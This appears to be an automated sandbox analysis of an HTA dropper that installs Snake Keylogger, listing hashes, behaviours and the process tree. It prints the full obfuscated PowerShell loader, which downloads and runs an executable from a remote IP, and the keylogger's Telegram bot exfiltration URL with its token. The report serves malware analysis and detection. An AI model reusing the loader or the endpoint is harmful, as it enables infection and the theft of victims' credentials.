Analysis
-
max time kernel
240s -
max time network
243s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
16/10/2024, 01:40
Static task
static1
Behavioral task
behavioral1
Sample
16102024_0140_niceworkingprojectforeveryone.hta
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
16102024_0140_niceworkingprojectforeveryone.hta
Resource
win10v2004-20241007-en
General
-
Target
16102024_0140_niceworkingprojectforeveryone.hta
-
Size
165KB
-
MD5
44ad3c49b38f4f6f1739baf86d528fd3
-
SHA1
afcf27df0ee2373846a1f6b8027e9cfcea77c486
-
SHA256
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368
-
SHA512
e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691
-
SSDEEP
96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/2440-36-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2440-35-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2440-34-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2316 PoweRsHELl.ExE -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2316 PoweRsHELl.ExE 2824 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2896 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 2316 PoweRsHELl.ExE -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x003000000001939b-26.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2896 set thread context of 2440 2896 taskhostw.exe 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PoweRsHELl.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2316 PoweRsHELl.ExE 2824 powershell.exe 2316 PoweRsHELl.ExE 2316 PoweRsHELl.ExE 2440 RegSvcs.exe 2440 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2896 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2316 PoweRsHELl.ExE Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 2440 RegSvcs.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2528 wrote to memory of 2316 2528 mshta.exe 29 PID 2528 wrote to memory of 2316 2528 mshta.exe 29 PID 2528 wrote to memory of 2316 2528 mshta.exe 29 PID 2528 wrote to memory of 2316 2528 mshta.exe 29 PID 2316 wrote to memory of 2824 2316 PoweRsHELl.ExE 31 PID 2316 wrote to memory of 2824 2316 PoweRsHELl.ExE 31 PID 2316 wrote to memory of 2824 2316 PoweRsHELl.ExE 31 PID 2316 wrote to memory of 2824 2316 PoweRsHELl.ExE 31 PID 2316 wrote to memory of 2868 2316 PoweRsHELl.ExE 32 PID 2316 wrote to memory of 2868 2316 PoweRsHELl.ExE 32 PID 2316 wrote to memory of 2868 2316 PoweRsHELl.ExE 32 PID 2316 wrote to memory of 2868 2316 PoweRsHELl.ExE 32 PID 2868 wrote to memory of 2772 2868 csc.exe 33 PID 2868 wrote to memory of 2772 2868 csc.exe 33 PID 2868 wrote to memory of 2772 2868 csc.exe 33 PID 2868 wrote to memory of 2772 2868 csc.exe 33 PID 2316 wrote to memory of 2896 2316 PoweRsHELl.ExE 35 PID 2316 wrote to memory of 2896 2316 PoweRsHELl.ExE 35 PID 2316 wrote to memory of 2896 2316 PoweRsHELl.ExE 35 PID 2316 wrote to memory of 2896 2316 PoweRsHELl.ExE 35 PID 2896 wrote to memory of 2440 2896 taskhostw.exe 36 PID 2896 wrote to memory of 2440 2896 taskhostw.exe 36 PID 2896 wrote to memory of 2440 2896 taskhostw.exe 36 PID 2896 wrote to memory of 2440 2896 taskhostw.exe 36 PID 2896 wrote to memory of 2440 2896 taskhostw.exe 36 PID 2896 wrote to memory of 2440 2896 taskhostw.exe 36 PID 2896 wrote to memory of 2440 2896 taskhostw.exe 36 PID 2896 wrote to memory of 2440 2896 taskhostw.exe 36 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16102024_0140_niceworkingprojectforeveryone.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE"C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3erzvzu.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8602.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8601.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2772
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2440
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD595620a347d51db77f4a5c57a6b1b840e
SHA16d7f9ef008c97b0a20d1411a446bfe14e2abb81c
SHA2566562885a0315b918541689be9239a14fd4c44e3d53a5b544bce398682680fe5f
SHA512a9edb4bb78916cd394946f73a8dbea798ac1fb3063df84dcbf97b341778445b438a303d8ed70f5ff3eb350e57cbef2731315b70d6b5ddaec70bfc10d62898224
-
Filesize
3KB
MD55c337f847566d92b9f38ce0f4c0cc8f3
SHA18ba8640810bbdfa72f02b1e55737bfffab49203a
SHA2564a0a9201c590012f7a8e38cd42c220853f573c219fe48bea13aee7782cb92312
SHA512b6adb63b0f933c3d408e99e591117e4926183276a923ad2428ce12d53f08824a338650046d2c35803b182da7a83a83b6f6df8f5b0b23491029269de7ba588557
-
Filesize
7KB
MD52822de9663d6b2e4e0d911419c587a27
SHA16057202b17f53918cbc8efa925ed8d2cdd6723ea
SHA256a79b6312d75f66ee9e5ccca0ea8b001f9db211c6d21c05fea9d4eb788fe7a67e
SHA5123797e6161f4fdac62939385ed75e8384e3c1bae9ee5d06c2444f631f632fdc7d5d8a5a68be5d0cd1d1fc1ca782ea5ff302ad3e5e4ca3b3bb59c0bb03abf861a7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5aa159bd2e415cfd34e1f0815b05a246c
SHA1a5076713116fa301c5f749a1b646a01db936a3b1
SHA256ac7cdf7431b28953388ed21f99645cdc15ebe1efda468545a95876b0224e661f
SHA5123f6e0f23ef4b3bc2201029efd0376ea9f8ed370ce8fcbc38d6171e33556c59fc5645618d88ed11f062c6f2158db67c4c1e40da382ae985dc6668eeb08d9d7b78
-
Filesize
948KB
MD53e2f27edd3deacd8f08f6ed1133b2040
SHA1060e3218949c5a006bb8607e8228e6539b737bfb
SHA256163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86
SHA512da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42
-
Filesize
652B
MD5b6578b91401729f486ddc70ef092c351
SHA19920c39989cf48f106a98a9092ede1816f90eff1
SHA256bb0261b231cc16054f6cb81eee13f60aa45bd2040b2404b51f49860fae1e1d08
SHA51272623414964a4862cbfd45fe27efd972458ba9ca3cc36b41894f08f3693acd246a51fcb7d003ed8a1d2a732df0d07a05457f4cffaeba3f02970eac549870c47b
-
Filesize
475B
MD5ecc2c10cb4c5954e2d5156bce54e41f4
SHA12d7cde31f9942c1dc80c493c03d675962991bf31
SHA25621d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac
SHA512bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96
-
Filesize
309B
MD5a35aa4e335fdf2563f4fa23cf3d49f11
SHA162d90fa02d4a8a0a4952aa648ef61f296b09d6cf
SHA2565507d350a25c56f0fb3b2ee88c8bb50a258f86ec4385fa70bf74fb5cad4dfa61
SHA51253ff64f8ae3c4a605353ebb7de123c7468613b9afc31d5e09ad01d9022bd2fad3369e7026e3df128935059bd95f6e3607e94d3fb4227ea28d496b3010a256ed8